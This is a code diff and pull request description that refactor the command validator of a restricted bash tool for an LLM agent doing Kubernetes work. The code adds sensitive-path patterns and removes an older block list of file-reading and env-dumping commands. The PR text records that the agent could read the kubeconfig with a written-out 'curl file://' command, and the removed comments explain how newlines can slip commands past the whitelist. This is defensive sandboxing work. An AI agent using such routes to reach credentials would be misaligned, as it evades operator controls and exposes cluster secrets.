 import { SAFE_SUBCOMMANDS, validateExecCommand } from "./kubectl.js";
 import { loadConfig } from "../core/config.js";
 import {
-  ALLOWED_COMMANDS,
-  parseArgs,
   getCommandBinary,
+  parseArgs,
   validateCommandRestrictions,
 } from "./command-sets.js";
 import { resolveKubeconfigPath, resolveKubeconfigByName } from "./kubeconfig-resolver.js";
 import { sanitizeEnv } from "./sanitize-env.js";
+import {
+  validateCommand as _validateCommand,
+  extractCommands as _extractCommands,
+  validateShellOperators as _validateShellOperators,
+} from "./command-validator.js";
 
 const execAsync = promisify(exec);
 
-/**
- * Extract individual commands from a shell pipeline.
- * Splits on |, &&, ;, || while respecting quotes and subshells.
- */
-export function extractCommands(input: string): string[] {
-  const commands: string[] = [];
-  let current = "";
-  let inQuote: string | null = null;
-  let parenDepth = 0;
+// ── Re-exports for backward compatibility ────────────────────────────
 
-  for (let i = 0; i < input.length; i++) {
-    const ch = input[i];
-
-    if (inQuote) {
-      current += ch;
-      if (ch === inQuote && input[i - 1] !== "\\") {
-        inQuote = null;
-      }
-      continue;
-    }
-
-    if (ch === '"' || ch === "'" || ch === "`") {
-      inQuote = ch;
-      current += ch;
-      continue;
-    }
-
-    if (ch === "(") {
-      parenDepth++;
-      current += ch;
-      continue;
-    }
-    if (ch === ")") {
-      parenDepth--;
-      current += ch;
-      continue;
-    }
-
-    // Only split at top-level (not inside subshells)
-    if (parenDepth === 0) {
-      // Check for ||, &&
-      if (
-        (ch === "&" && input[i + 1] === "&") ||
-        (ch === "|" && input[i + 1] === "|")
-      ) {
-        if (current.trim()) commands.push(current.trim());
-        current = "";
-        i++; // skip next char
-        continue;
-      }
-      // Check for single & (background), | and ;
-      // But skip & when preceded by > (fd redirection like >&2, 2>&1)
-      if (ch === "&" && current.length > 0 && current[current.length - 1] === ">") {
-        current += ch;
-        continue;
-      }
-      if (ch === "&" || ch === "|" || ch === ";") {
-        if (current.trim()) commands.push(current.trim());
-        current = "";
-        continue;
-      }
-    }
-
-    current += ch;
-  }
-
-  if (current.trim()) commands.push(current.trim());
-  return commands;
-}
-
-/**
- * Validate that a command does not use dangerous shell operators.
- * Scans character-by-character respecting quotes.
- * Blocks: > >> (output redirection, except >&N fd duplication and >/dev/null),
- *         $() and backticks (command substitution), <() >() (process substitution).
- * Returns an error message if blocked, or null if safe.
- */
-export function validateShellOperators(command: string): string | null {
-  let inQuote: string | null = null;
-
-  for (let i = 0; i < command.length; i++) {
-    const ch = command[i];
-
-    // Block newline/carriage-return characters — bash interprets them as command
-    // separators, but extractCommands() does not split on them, so they can be
-    // used to smuggle commands past whitelist validation.
-    if (ch === "\n" || ch === "\r") {
-      return JSON.stringify({
-        error: "Newline characters are not allowed in commands.",
-      }, null, 2);
-    }
-
-    // Block backtick command substitution everywhere (including inside quotes)
-    if (ch === "`") {
-      return JSON.stringify({
-        error: "Backtick command substitution is not allowed.",
-      }, null, 2);
-    }
-
-    // Block $() command substitution everywhere (including inside quotes)
-    if (ch === "$" && command[i + 1] === "(") {
-      return JSON.stringify({
-        error: "$() command substitution is not allowed.",
-      }, null, 2);
-    }
-
-    // Track quote state for redirection checks only
-    if (inQuote) {
-      if (ch === inQuote && command[i - 1] !== "\\") {
-        inQuote = null;
-      }
-      continue;
-    }
-
-    if (ch === "'" || ch === '"') {
-      inQuote = ch;
-      continue;
-    }
-
-    // Block <() process substitution
-    if (ch === "<" && command[i + 1] === "(") {
-      return JSON.stringify({
-        error: "<() process substitution is not allowed.",
-      }, null, 2);
-    }
-
-    // Block bare < input redirection (but not <( which is already handled above)
-    if (ch === "<" && command[i + 1] !== "(") {
-      return JSON.stringify({
-        error: "Input redirection (<) is not allowed.",
-      }, null, 2);
-    }
-
-    // Check output redirection: > and >>
-    if (ch === ">") {
-      // Allow >() process substitution — already blocked above when preceded by nothing,
-      // but >( after a word is process substitution too
-      if (command[i + 1] === "(") {
-        return JSON.stringify({
-          error: ">() process substitution is not allowed.",
-        }, null, 2);
-      }
-
-      // Allow fd duplication: >&N (e.g. 2>&1, >&2)
-      if (command[i + 1] === "&") continue;
-
-      // Determine the redirect target (skip optional second > for >>)
-      let j = i + 1;
-      if (command[j] === ">") j++; // >>
-      // Skip whitespace
-      while (j < command.length && command[j] === " ") j++;
-
-      // Allow redirect to /dev/null
-      const target = command.substring(j);
-      if (/^\/dev\/null\b/.test(target)) continue;
-
-      return JSON.stringify({
-        error: "Output redirection (> or >>) to files is not allowed.",
-      }, null, 2);
-    }
-  }
-
-  return null;
-}
-
-// Compatibility re-exports — keep old import paths working
+export { extractCommands, validateShellOperators } from "./command-validator.js";
 export { getCommandBinary, ALLOWED_COMMANDS as ALLOWED_BINARIES } from "./command-sets.js";
+
+// ── kubectl pipeline validator ───────────────────────────────────────
 
 /**
  * Validate kubectl commands within a pipeline.
@@ -231,10 +74,8 @@ export function validateKubectlInPipeline(commands: string[]): string | null {
   return null;
 }
 
-/**
- * Compatibility wrappers — delegate to shared validateCommandRestrictions.
- * Keeps old imports (validateFindInPipeline etc.) working for tests.
- */
+// ── Compatibility wrappers ───────────────────────────────────────────
+
 export function validateFindInPipeline(commands: string[]): string | null {
   for (const cmd of commands) {
     const binary = getCommandBinary(cmd);
@@ -264,6 +105,8 @@ export function validateIpInPipeline(commands: string[]): string | null {
   }
   return null;
 }
+
+// ── Skill script detection ───────────────────────────────────────────
 
 /**
  * Check if a shell command invokes a script under <cwd>/skills/.
@@ -312,27 +155,15 @@ export function isSkillScript(cmd: string): boolean {
   }
 }
 
-/**
- * Commands blocked in local bash — these can read local files or expose secrets,
- * bypassing the path-restricted Read/Grep/Glob tools.
- * Use dedicated tools instead: Read (cat), Glob (find/ls), Grep (grep on files).
- *
- * NOTE: ALLOWED_COMMANDS is shared with node-exec/pod-exec (remote contexts)
- * where these commands are legitimate. Only restricted-bash (local) blocks them.
- */
-const LOCAL_BLOCKED_COMMANDS = new Set([
-  // file reading — use Read tool (path-restricted to cwd)
-  "cat", "ls", "find", "stat", "file",
-  "readlink", "realpath", "basename", "dirname",
-  "diff", "md5sum", "sha256sum",
-  "strings", "lsof", "lsns",
-  // compressed file reading
-  "zcat", "zgrep", "bzcat", "xzcat",
-  // environment variable exposure — may contain API keys, DB passwords
-  "env", "printenv",
-  // not useful in restricted context
-  "pwd",
-]);
+// ── Sensitive path patterns ──────────────────────────────────────────
+
+const SENSITIVE_PATH_RE = [
+  /\.siclaw\/config\/settings\.json/,
+  /\.siclaw\/credentials\//,
+  /\$\{?KUBECONFIG\}?/,
+];
+
+// ── Tool definition ─────────────────────────────────────────────────
 
 interface RestrictedBashParams {
   command: string;
@@ -390,97 +221,24 @@ Do NOT use for non-kubectl tasks (file editing, package management, etc.).`,
         };
       }
 
-      // Validate shell operators on raw command (before splitting)
-      const shellOpError = validateShellOperators(command);
-      if (shellOpError) {
+      // Unified validation: context-based whitelist + shell operators +
+      // kubectl subcommands + command restrictions + sensitive paths
+      const cmdErr = _validateCommand(command, {
+        context: "local",
+        extraAllowed: new Set(["kubectl"]),
+        isAllowed: (cmd) => isSkillScript(cmd),
+        pipelineValidators: [validateKubectlInPipeline],
+        sensitivePathPatterns: SENSITIVE_PATH_RE,
+      });
+      if (cmdErr) {
         return {
-          content: [{ type: "text", text: shellOpError }],
+          content: [{ type: "text", text: cmdErr }],
           details: { blocked: true },
         };
-      }
-
-      // Validate all commands in the pipeline
-      const commands = extractCommands(command);
-      const violations: string[] = [];
-
-      for (const cmd of commands) {
-        const binary = getCommandBinary(cmd);
-        if (!binary) continue;
-        // Block local file-access commands (use Read/Grep/Glob tools instead)
-        if (LOCAL_BLOCKED_COMMANDS.has(binary)) {
-          violations.push(binary);
-          continue;
-        }
-        if (ALLOWED_COMMANDS.has(binary) || binary === "kubectl") continue;
-        // Allow skill scripts (skills/...) — both "bash script.sh" and direct invocation
-        if (isSkillScript(cmd)) {
-          continue;
-        }
-        violations.push(binary);
-      }
-
-      if (violations.length > 0) {
-        return {
-          content: [
-            {
-              type: "text",
-              text: JSON.stringify(
-                {
-                  error: `Blocked: disallowed command(s): ${[...new Set(violations)].join(", ")}`,
-                  allowed: ["kubectl", ...ALLOWED_COMMANDS].sort(),
-                },
-                null,
-                2
-              ),
-            },
-          ],
-          details: { blocked: true, violations },
-        };
-      }
-
-      // Validate kubectl subcommands (read-only whitelist)
-      const kubectlError = validateKubectlInPipeline(commands);
-      if (kubectlError) {
-        return {
-          content: [{ type: "text", text: kubectlError }],
-          details: { blocked: true },
-        };
-      }
-
-      // Validate command-level restrictions (find -exec, awk system(), etc.)
-      for (const cmd of commands) {
-        const err = validateCommandRestrictions(cmd);
-        if (err) {
-          return {
-            content: [{ type: "text", text: err }],
-            details: { blocked: true },
-          };
-        }
-      }
-
-      // Block reading sensitive credential/config files via any file-reading command.
-      // Also catches $KUBECONFIG / ${KUBECONFIG} shell variable expansion.
-      const SENSITIVE_PATH_RE = [
-        /\.siclaw\/config\/settings\.json/,
-        /\.siclaw\/credentials\//,
-        /\$\{?KUBECONFIG\}?/,
-      ];
-      const FILE_READING_CMDS = ["cat", "head", "tail", "less", "more", "grep", "awk", "gawk"];
-      for (const cmd of commands) {
-        const binary = getCommandBinary(cmd);
-        if (binary && FILE_READING_CMDS.includes(binary)) {
-          if (SENSITIVE_PATH_RE.some((re) => re.test(cmd))) {
-            return {
-              content: [{ type: "text", text: JSON.stringify({
-                error: "Reading credential or config files is not allowed.",
-              }, null, 2) }],
-              details: { blocked: true },
-            };
-          }
-        }
       }
 
       // Skill scripts (debug pods, perftest, etc.) need longer timeouts
+      const commands = _extractCommands(command);
       const isSkill = commands.some((c) => isSkillScript(c));
       const defaultTimeout = isSkill ? 180 : 60;
       const timeout = Math.min(params.timeout_seconds ?? defaultTimeout, 300) * 1000;


### PR DESCRIPTION
## Summary

- **Application-level defense**: Refactored command validation into a 6-pass pipeline with context-based whitelists (`local`/`node`/`pod`/`nsenter`), declarative `COMMAND_RULES` engine (pipeOnly, noFilePaths, blockedFlags), and `extractPipeline()` for pipe-position tracking
- **Vulnerability fix**: Blocked `curl file://` protocol — LLM agent could read kubeconfig via `curl file:///app/.siclaw/credentials/kubeconfig`
- **OS-level isolation (ADR-010)**: Dual-user model (`agentbox` + `sandbox`) with setgid kubectl. Child processes run as `sandbox` user via sudo, which cannot read credential files. K8s pods get `drop: ALL` + `add: [SETUID, SETGID]` capabilities and seccomp RuntimeDefault

## Security Architecture

```
Entrypoint (root) → runuser → Node.js (agentbox)
                                  ↓
                        sudo -E -u sandbox → bash -c 'command'
                                               ↓
                                         kubectl (setgid kubecred) → reads kubeconfig ✓
                                         curl/grep/etc → can't read credentials ✓
```

6 independent defense layers:
1. OS user isolation (primary) — sandbox user, file permissions
2. Command whitelist — context-based binary allowlists
3. Shell operator blocking — $(), backticks, redirections
4. Pipeline validation — kubectl subcommand + exec checks
5. COMMAND_RULES — per-command: pipeOnly, noFilePaths, blockedFlags
6. Sensitive path patterns — block commands targeting credential paths

## Files Changed

| File | Change |
|------|--------|
| `docs/design/security.md` | New: full security architecture document |
| `docs/design/decisions.md` | ADR-010: dual-user OS isolation |
| `docs/design/invariants.md` | Section 3 rewritten for defense-in-depth |
| `CLAUDE.md` | Security section updated |
| `src/tools/command-sets.ts` | COMMAND_RULES engine, context categories |
| `src/tools/command-validator.ts` | 6-pass pipeline, extractPipeline() |
| `src/tools/restricted-bash.ts` | sudo -u sandbox wrapper in production |
| `src/tools/restricted-bash.test.ts` | +250 lines: pipeline, pipeOnly, curl tests |
| `Dockerfile.agentbox` | Dual-user, setgid kubectl, sudoers, SUID audit |
| `docker/agentbox-entrypoint.sh` | New: permission enforcement + privilege drop |
| `src/gateway/agentbox/k8s-spawner.ts` | securityContext, initContainer, credentials volume |

## Test plan

- [x] `npx tsc --noEmit` passes
- [x] All 187 restricted-bash tests pass
- [x] Docker image builds successfully, user/permission setup verified
- [x] Deployed to K8s cluster (siclaw namespace), agentbox pod starts and responds
- [ ] Security test: agent cannot read credentials via text commands (cut, grep, etc.)
- [ ] Security test: agent cannot read credentials via curl file://
- [ ] Security test: kubectl works normally (setgid kubecred)